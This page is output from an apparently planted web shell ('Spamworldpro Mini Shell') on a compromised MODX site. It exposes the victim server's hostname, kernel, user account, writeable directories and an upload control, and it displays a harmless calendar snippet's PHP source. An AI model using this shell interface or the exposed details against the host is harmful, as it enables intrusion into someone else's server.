Spamworldpro Mini Shell
Spamworldpro


Server : Apache
System : Linux indy02.toastserver.com 3.10.0-962.3.2.lve1.5.85.el7.x86_64 #1 SMP Thu Apr 18 15:18:36 UTC 2024 x86_64
User : palandch ( 1163)
PHP Version : 7.1.33
Disable Function : NONE
Directory :  /home/palandch/public_html/core/components/gcalevents/snippets/

Upload File :
current_dir [ Writeable ] document_root [ Writeable ]

 

Current File : //home/palandch/public_html/core/components/gcalevents/snippets/gcalWeekView.snippet.php
<?php

require_once MODX_CORE_PATH.'components/gcalevents/model/gcalevents/gcalevents.class.php';

$scriptProperties['outputMode'] = 'week';
$scriptProperties['currentWeek'] = is_numeric($_GET['w']) ? $_GET['w']:date('W');
$scriptProperties['currentYear'] = is_numeric($_GET['y']) ? $_GET['y']:date('Y');
$gca = new gCalEvents($modx, $scriptProperties);
$gca->init();

/**
*** Scripts and styles
*** &jsPath=`` &cssPath=`` define a path to a stylesheet and a javascript file
***
**/

if($gca->c['includeJS'] == 1) {
	$modx->regClientStartupScript($gca->c['jsPath']);
}
if($gca->c['includeCSS'] == 1) {
	$modx->regClientCSS($gca->c['cssPath']);
}

/**
*** WARNING
*** If you set the debug property, all scriptProperties will be printed.
*** This includes your privateCookie if you supplied one in the snippet-call.
**/

if(!isset($gca->c['debug'])) {
	return $gca->output[$gca->c['outputType']][$gca->c['outputMode']][$gca->c['currentYear'].$gca->c['currentWeek']];
} else {
	return $gca->debug();	
}

Spamworldpro Mini